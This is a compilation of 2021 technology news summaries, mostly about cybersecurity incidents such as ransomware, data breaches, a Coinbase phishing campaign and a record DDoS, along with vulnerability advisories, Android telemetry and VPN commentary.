Ransomware gangs have silently hit three US water and wastewater treatment facilities this year, in 2021, the US government said in a joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA. From a report: The attacks -- which had been previously unreported -- took place in March, July, and August and hit facilities in Nevada, Maine, and California, respectively. The attacks led to the threat actors encrypting files, and in one case, even corrupting a computer used to control the SCADA industrial equipment deployed inside the treatment plant. The three new incidents were listed as examples of what could happen when water treatment facilities ignore and fail to secure their computer networks.

For at least the second time in 2021, hackers have breached Acer's servers, this time plundering more than 60 gigabytes of data. HotHardware reports: Acer has confirmed that names, addresses, and phone numbers belonging to several million clients have been compromised in the breach, as well as sensitive corporate financial and audit details. If nothing else, this is certainly bad optics for Acer, which earlier this year was on the receiving end of a massive $50 million ransomware campaign. As proof of the data theft, the ransomware gang posted a bunch of stolen files on the REvil website, including financial spreadsheets, bank balances, and bank communications. It was never made clear if this was partially the result of Microsoft Exchange vulnerabilities that had been used before then by Chinese hackers. In any event, now several months latest, hacking group Desorden said it has infiltrated Acer's servers in India and swiped data relating to "millions" of customers.

On Thursday, Gov. Michael Parson (R) called a news conference to warn his state's citizens about a nefarious plot against a teachers' database by a reporter from the St. Louis Post-Dispatch. From a report: "Through a multistep process," Parson said with great solemnity, "an individual took the records of at least three educators, decoded the HTML source code and viewed the Social Security number of those specific educators."

[...] The Post-Dispatch report explains what their reporter, Josh Renaud, did to view the Social Security numbers of Missouri teachers on a website run by the state education department. (The website has been taken down; you can view an old version of it at the Internet Archive.) "Though no private information was clearly visible nor searchable on any of the web pages," the Post-Dispatch's report stated, "the newspaper found that teachers' Social Security numbers were contained in the HTML source code of the pages involved." In other words, it seems, a search tool for teacher credentials responded to searches by including a bunch of information, some of which was embedded in the source code of the page but not visible when just reading the page.

Boeing and U.S. regulators said Thursday that some titanium 787 Dreamliner parts were improperly manufactured over the past three years, the latest in a series of problems to plague the wide-body aircraft. From a report: The quality issue does not affect the immediate safety of flights, the company and the Federal Aviation Administration (FAA) said. Boeing said the parts were provided Leonardo, which bought the items from Italy-based Manufacturing Processes Specification (MPS). MPS is no longer a supplier to Leonardo, Boeing said.

The parts include fittings that help secure the floor beam in one fuselage section, as well as other fittings, spacers, brackets, and clips within other assemblies. Undelivered aircraft will be reworked as needed, Boeing said, adding that any fleet actions would be determined through its normal review process and confirmed with the FAA. The defect was found as the planemaker grapples with other problems in its 787 that have caused it to cut production and halt deliveries since May.

Apple said today that one of the reasons it does not allow app sideloading or the use of third-party app stores on iOS is because of privacy and security reasons, pointing to the fact that Android sees between 15 to 47 times more malware compared to its app ecosystem. The Record reports: Apple says that the reason its iOS devices are locked into the App Store as the only way to install applications is for security reasons, as this allows its security teams to scan applications for malicious content before they reach users. Apple cited statements from multiple sources (DHS, ENISA, Europol, Interpol, NIST, Kaspersky, Wandera, and Norton), all of which had previously warned users against installing apps from outside official app stores, a process known as app sideloading.

Apple's report then goes on to list multiple malware campaigns targeting Android devices where the threat actors asked users to sideload malicious apps hosted on internet sites or third-party app stores. [...] The list includes a host of threats, such as mundane adware, dangerous ransomware, funds-stealing banking trojans, commercial spyware, and even nation-state malware, which Apple said threat actors have spread by exploiting the loophole in Android's app installation process that allows anyone to install apps from anywhere on the internet. Today's 31-page report (PDF) is the second iteration of the same report, with a first version (PDF) being published back in June, shortly after EU authorities announced their investigation.

An anonymous reader quotes a report from from Krebs on Security: A recent phishing campaign targeting Coinbase users shows thieves are getting smarter about phishing one-time passwords (OTPs) needed to complete the login process. It also shows that phishers are attempting to sign up for new Coinbase accounts by the millions as part of an effort to identify email addresses that are already associated with active accounts. Coinbase is the world's second-largest cryptocurrency exchange, with roughly 68 million users from over 100 countries. The now-defunct phishing domain at issue -- coinbase.com.password-reset[.]com -- was targeting Italian Coinbase users (the site's default language was Italian). And it was fairly successful, according to Alex Holden, founder of Milwaukee-based cybersecurity firm Hold Security.

Holden's team managed to peer inside some poorly hidden file directories associated with that phishing site, including its administration page. That panel, pictured in the redacted screenshot below, indicated the phishing attacks netted at least 870 sets of credentials before the site was taken offline. Holden said each time a new victim submitted credentials at the Coinbase phishing site, the administrative panel would make a loud "ding" -- presumably to alert whoever was at the keyboard on the other end of this phishing scam that they had a live one on the hook. In each case, the phishers manually would push a button that caused the phishing site to ask visitors for more information, such as the one-time password from their mobile app. "These guys have real-time capabilities of soliciting any input from the victim they need to get into their Coinbase account," Holden said. Pressing the "Send Info" button prompted visitors to supply additional personal information, including their name, date of birth, and street address. Armed with the target's mobile number, they could also click "Send verification SMS" with a text message prompting them to text back a one-time code.

Holden said the phishing group appears to have identified Italian Coinbase users by attempting to sign up new accounts under the email addresses of more than 2.5 million Italians. His team also managed to recover the username and password data that victims submitted to the site, and virtually all of the submitted email addresses ended in ".it." But the phishers in this case likely weren't interested in registering any accounts. Rather, the bad guys understood that any attempts to sign up using an email address tied to an existing Coinbase account would fail. After doing that several million times, the phishers would then take the email addresses that failed new account signups and target them with Coinbase-themed phishing emails. Holden's data shows this phishing gang conducted hundreds of thousands of halfhearted account signup attempts daily. For example, on Oct. 10 the scammers checked more than 216,000 email addresses against Coinbase's systems. The following day, they attempted to register 174,000 new Coinbase accounts.

Verizon's Visible network has confirmed that some accounts were accessed without authorization. Visible is a cell service owned and operated by Verizon that "pitches itself as a less expensive, 'all-digital' network, meaning there aren't any physical stores like you'd get with a tradtiional carrier," notes The Verge. From the report: Starting on Monday, customers on both Twitter and Reddit reported en masse that they'd been getting emails from the company about changed passwords and addresses, and that they've had difficulties contacting the company's chat support. Visible's customer service account on Twitter seemingly hasn't addressed the issue, besides directing upset customers to its DMs. A user marked as a Visible employee on the subreddit posted a statement on Monday afternoon, saying that a "small number" of accounts were affected, but that the company didn't believe its systems had been breached. The statement did recommend that users change their passwords, but as many commenters pointed out (and as I can confirm), the password reset system currently isn't working. In a follow-up article, The Verge reports that Visible has confirmed customer reports of attackers accessing and changing user accounts. The company said that the breaches were carried out using usernames and passwords from "outside sources," adding that it's worked to "mitigate the issue" since it became aware of it. They're recommending you reset your password if it's one you've used for other services.

Activision unveiled its Ricochet anti-cheat system for Call of Duty games as it tries to attack a longstanding cheating problem that has frustrated a lot of players. From a report: The new system will get rid of players cheating in Call of Duty: Warzone later this year and it will debut with Call of Duty: Vanguard, the new premium game coming on multiple platforms on November 5. Activision, whose parent company Activision Blizzard has been sued for having an alleged toxic culture of its own, said in its announcement that cheating in Call of Duty is frustrating for players, developers, and the entire community. The anti-cheat team has made great strides in fighting this persistent issue that affects so many, but the company said it knows more must be done. Ricochet is supported by a team of dedicated professionals focused on fighting unfair play.

The Ricochet anti-cheat initiative is a multi-faceted approach to combat cheating, featuring new server-side tools which monitor analytics to identify cheating, enhanced investigation processes to stamp out cheaters, updates to strengthen account security, and more. Ricochet's backend anti-cheat security features will launch alongside Call of Duty: Vanguard, and later this year with the Pacific update coming to Call of Duty: Warzone. In addition to server enhancements coming with Ricochet is a new PC kernel-level driver, developed internally for the Call of Duty franchise, and launching first for Call of Duty: Warzone. This driver will assist in the identification of cheaters, reinforcing and strengthening the overall server security. The kernel-level driver launches alongside the Pacific update for Warzone later this year. Further reading: Cheat Maker Is Not Afraid of Call of Duty's New Kernel-Level Anti-Cheat.

AMD warned last week that its chips are experiencing performance issues in Windows 11, and now Microsoft's first update to its new OS has reportedly made the problems worse. From a report: TechPowerUp reports that it's seeing much higher latency, which means worse performance, after the Windows 11 update went live yesterday. AMD and Microsoft found two issues with Windows 11 on Ryzen processors. Windows 11 can cause L3 cache latency to triple, slowing performance by up to 15 percent in certain games. The second issue affects AMD's preferred core technology, that shifts threads over to the fastest core on a processor. AMD says this second bug could impact performance on CPU-reliant tasks. TechPowerUp measured the L3 cache latency on its Ryzen 7 2700X at around 10ns, and Windows 11 increased this to 17ns. "This was made much worse with the October 12 'Patch Tuesday' update, driving up the latency to 31.9ns," says TechPowerUp. That's a huge jump, and the exact type of issue AMD warned about.

A new study (PDF) by a team of university researchers in the UK has unveiled a host of privacy issues that arise from using Android smartphones. BleepingComputer reports: The researchers have focused on Samsung, Xiaomi, Realme, and Huawei Android devices, and LineageOS and /e/OS, two forks of Android that aim to offer long-term support and a de-Googled experience. The conclusion of the study is worrying for the vast majority of Android users: "With the notable exception of /e/OS, even when minimally configured and the handset is idle these vendor-customized Android variants transmit substantial amounts of information to the OS developer and also to third parties (Google, Microsoft, LinkedIn, Facebook, etc.) that have pre-installed system apps." As the summary table indicates, sensitive user data like persistent identifiers, app usage details, and telemetry information are not only shared with the device vendors, but also go to various third parties, such as Microsoft, LinkedIn, and Facebook. And to make matters worse, Google appears at the receiving end of all collected data almost across the entire table.

It is important to note that this concerns the collection of data for which there's no option to opt-out, so Android users are powerless against this type of telemetry. This is particularly concerning when smartphone vendors include third-party apps that are silently collecting data even if they're not used by the device owner, and which cannot be uninstalled. For some of the built-in system apps like miui.analytics (Xiaomi), Heytap (Realme), and Hicloud (Huawei), the researchers found that the encrypted data can sometimes be decoded, putting the data at risk to man-in-the-middle (MitM) attacks. As the study points out, even if the user resets the advertising identifiers for their Google Account on Android, the data-collection system can trivially re-link the new ID back to the same device and append it to the original tracking history. The deanonymization of users takes place using various methods, such as looking at the SIM, IMEI, location data history, IP address, network SSID, or a combination of these. In response to the report, a Google spokesperson said: "While we appreciate the work of the researchers, we disagree that this behavior is unexpected -- this is how modern smartphones work. As explained in our Google Play Services Help Center article, this data is essential for core device services such as push notifications and software updates across a diverse ecosystem of devices and software builds. For example, Google Play services uses data on certified Android devices to support core device features. Collection of limited basic information, such as a device's IMEI, is necessary to deliver critical updates reliably across Android devices and apps."

A woman allegedly hacked into the systems of a flight training school in Florida to delete and tamper with information related to the school's airplanes. In some cases, planes that previously had maintenance issues had been "cleared" to fly, according to a police report. The hack, according to the school's CEO, could have put pilots in danger. From a report: Lauren Lide, a 26-year-old who used to work for the Melbourne Flight Training school, resigned from her position of Flight Operations Manager at the end of November of 2019, after the company fired her father. Months later, she allegedly hacked into the systems of her former company, deleting and changing records, in an apparent attempt to get back at her former employer, according to court records obtained by Motherboard. The news of her arrest was first reported by local TV station News Channel 8.

Derek Fallon, the CEO of Melbourne Flight Training called the police on January 17, 2020, and reported that five days before, he logged onto his account for Flight Circle, an app his company uses to manage and keep track of its airplanes, and found that there was missing information. Fallon found that someone had removed records related to planes with maintenance issues and reminders of inspections had all been deleted, "meaning aircraft which may have been unsafe to fly were purposely made 'airworthy,'" according to a document written by a Melbourne Airport Police officer.

Coinbase is getting into NFTs. The cryptocurrency exchange said Tuesday it plans to launch a marketplace that lets users mint, collect and trade NFTs, or non-fungible tokens. From a report: Users can sign up to a waitlist for early access to the feature, the company said. NFTs are one-of-a-kind digital assets designed to represent ownership of online items like rare art or collectible trading cards. They aren't fungible, meaning you can't exchange one NFT for another like you could with bitcoin and other cryptocurrencies. Sales of such tokens have boomed this year. The NFT market topped $10 billion in transaction volume in the third quarter of 2021, according to DappRadar, a company that tracks data on crypto-based applications.

Japanese technology giant Olympus has confirmed it was hit by a cyberattack over the weekend that forced it to shut down its IT systems in the U.S., Canada and Latin America. From a report: In a statement on its website, Olympus said it is "investigating a potential cybersecurity incident detected October 10" and is "currently working with the highest priority to resolve this issue."

"As part of the investigation and containment, we have suspended affected systems and have informed the relevant external partners. The current results of our investigation indicate the incident was contained to the Americas with no known impact to other regions. We are working with appropriate third parties on this situation and will continue to take all necessary measures to serve our customers and business partners in a secure way. Protecting our customers and partners and maintaining their trust in us is our highest priority. Our investigation is ongoing and we are committed to transparent disclosure and will continue to provide updates as new information becomes available."

It's near-identical to a statement put out by Olympus last month following a cyberattack on its European, Middle East and Africa network.

Microsoft said its Azure cloud service mitigated a 2.4 terabytes per second (Tbps) distributed denial of service attack this year, at the end of August, representing the largest DDoS attack recorded to date. From a report: Amir Dahan, Senior Program Manager for Azure Networking, said the attack was carried out using a botnet of approximately 70,000 bots primarily located across the Asia-Pacific region, such as Malaysia, Vietnam, Taiwan, Japan, and China, as well as the United States. Dahan identified the target of the attack only as "an Azure customer in Europe."

The Microsoft exec said the record-breaking DDoS attack came in three short waves, in the span of ten minutes, with the first at 2.4 Tbps, the second at 0.55 Tbps, and the third at 1.7 Tbps. Dahan said Microsoft successfully mitigated the attack without Azure going down. Prior to Microsoft's disclosure today, the previous DDoS record was held by a 2.3 Tbps attack that Amazon's AWS division mitigated in February 2020.

An anonymous reader shares a report: By the end of 2021, cybercrime is expected to cost the world $6 trillion. And by 2025, this figure will climb to $10.5 trillion, according to Cybersecurity Ventures. There's been a rash of recent high-profile cyberattacks, including Colonial Pipeline, the SolarWinds breach, and JBS USA. That's perhaps why 80% of senior IT employees believe that their companies lack sufficient protection against cyberattacks, despite increased security investments made in 2020.

To address the challenges, Google today at Google Cloud Next 2021 debuted Work Safer, a program to help organizations, employees, and partners collaborate in hybrid work environments. It also unveiled a new security-focused task force --- the Cybersecurity Action Team -- and a security and resilience framework, in addition to enhanced security capabilities in Workspace. The announcements come after research showing that companies want cloud providers to increase their security efforts. According to a a recent Tripwire survey, while the majority of enterprises believe that public cloud providers are doing enough to ensure security for users, it's "just barely adequate."

LibreOffice and OpenOffice have pushed updates to address a vulnerability that makes it possible for an attacker to manipulate documents to appear as signed by a trusted source. Although the severity of the flaw is classified as moderate, the implications could be dire. BleepingComputer reports: The discovery of the flaw, which is tracked as CVE-2021-41832 for OpenOffice, was the work of four researchers at the Ruhr University Bochum. The same flaw impacts LibreOffice, which is a fork of OpenOffice spawned from the main project over a decade ago, and for their project is tracked as CVE-2021-25635. If you're using either of the open-source office suites, you're advised to upgrade to the latest available version immediately. For OpenOffice, that would be 4.1.10 and later, and for LibreOffice, 7.0.5 or 7.1.1 and later. Since neither of these two applications offer auto-updating, you should do it manually by downloading the latest version from the respective download centers -- LibreOffice, OpenOffice. If you're using Linux and the aforementioned versions aren't available on your distribution's package manager yet, you are advised to download the "deb", or "rpm" package from the Download center or build LibreOffice from source. If updating to the latest version is not possible for any reason, you can always opt to completely disable the macro features on your office suite, or avoid trusting any documents containing macros.

Microsoft has shared details of a new known issue with Windows 11. The company has confirmed that a problem exists with apps that use certain characters in registry keys. From a report: As a result of the discovery, Microsoft has put a compatibility hold in place that means people with problematic apps installed will not be offered Windows 11 via Windows Update. The issue is under investigation. It seems that the issue is related to, or is an extension of, one of the three initial known issues with Windows 11.

Google has pulled several "stalkerware" ads that violated its policies by promoting apps that encouraged prospective users to spy on their spouses' phone. From a report: These consumer-grade spyware apps are often marketed to parents wishing to monitor their child's calls, messages, apps, photos and location, often under the guise of protecting against predators. But these apps, which are often designed to be installed surreptitiously and without the device owner's consent, have been repurposed by abusers to spy on the phones of their spouses.

[...] Last August, Google banned ads in users' search results that promoted apps that are designed "with the express purpose of tracking or monitoring another person or their activities without their authorization." But TechCrunch found five app makers were still advertising their stalkerware apps as recently as last week. "We do not allow ads promoting spyware for partner surveillance. We immediately removed the ads that violated this policy and will continue to track emerging behaviors to prevent bad actors from trying to evade our detection systems," a Google spokesperson told TechCrunch.

Cristiano Amon is the new boss of Qualcomm, a U.S. tech giant that designs semiconductors. His first task: Convince companies to make more chips for him -- and fast. From a report: Months before Cristiano Amon started as CEO of Qualcomm, he already was at work on his first crisis. To solve it, he sat in a mostly empty meeting room in Taipei and pleaded with executives from one of the world's biggest semiconductor makers for more chips. He needed the help so that Qualcomm, a designer of circuits that go into hundreds of millions of electronic devices every year, could chase new markets and meet demand from big customers such as Apple, Samsung Electronics and China's top handset-makers. In fact, he needed the assistance so much that he got permission from the Taiwanese government to arrive in March and then waited through a three-day quarantine. Once he and his team got to the meeting place in a Taipei hotel, they negotiated with counterparts across a large room outfitted with microphones and speakers to communicate.

"I'm a very big believer that sometimes you have to meet folks in person," said Mr. Amon, who was named CEO in January and officially took over in June. Many new CEOs across the business world had to adjust to their roles amid unprecedented pandemic-era restrictions, getting to know key employees without ever meeting them in person and managing offices and business relationships from far away. Few can say they had a more tumultuous transition than Mr. Amon, a gregarious Brazilian who revels in person-to-person contact. He is juggling a cluster of major challenges -- a global chip shortage, a sudden shift in a key market, and an unexpected acquisition opportunity -- while trying to put his own stamp on a company after working there for more than two decades. He wants to focus on an expansion beyond Qualcomm's core mobile-phone chip business, a shift that began before he took over. "I've been doing many things in parallel and I want to succeed in them all," he said in an interview. "I can't afford not to do them because we're in a hurry."

"I'm done with paying for a virtual private network," writes the New York Times' lead consumer technology writer. [Alternate URLs here and here.] The reality is that web security has improved so much in the last few years that VPN services, which charge monthly subscription fees that cost as much as Netflix, offer superfluous protection for most people concerned about privacy, some security researchers said.

Many of the most popular VPN services are now also less trustworthy than in the past because they have been bought by larger companies with shady track records. That's a deal-breaker when it comes to using a VPN service, which intercepts our internet traffic. If you can't trust a product that claims to protect your privacy, what good is it? "Trusting these people is really critical," Matthew Green, a computer scientist who studies encryption, said about VPN providers. "There's no good way to know what they're doing with your data, which they have huge amounts of control over...."

As a mainstream privacy tool, it's no longer an ideal solution. This sent me down a rabbit hole of seeking alternatives to paying for a VPN. I ended up using some web tools to create my own private network [on the cloud] for free, which wasn't easy... Not only is it free to use, but I no longer have to worry about trust because the operator of the technology is me.
"But I also learned that many casual users may not even need a VPN anymore," the article concludes. (Unless you're living in an authoritarian country and trying to reach information beyond its firewall.) One cybersecurity firm tells the Times that journalists with sensitive contacts or business executives carrying trade secrets might also still benefit from a VPN. But (according to the firm) the rest of us can just try two-factor authentication and keeping all of our software up-to-date. (And if you'd rather not use a public wifi network — use your phone as a mobile hot spot.)

The article also notes that 95% of the top 1,000 websites are now already encrypted with HTTPS, according to W3Techs.

It also points out that one VPN company accused of developing malware nonetheless spent close to a billion dollars to buy at least four other VPN services — and then also bought several VPN review sites, which then give top ratings to VPN services it owns...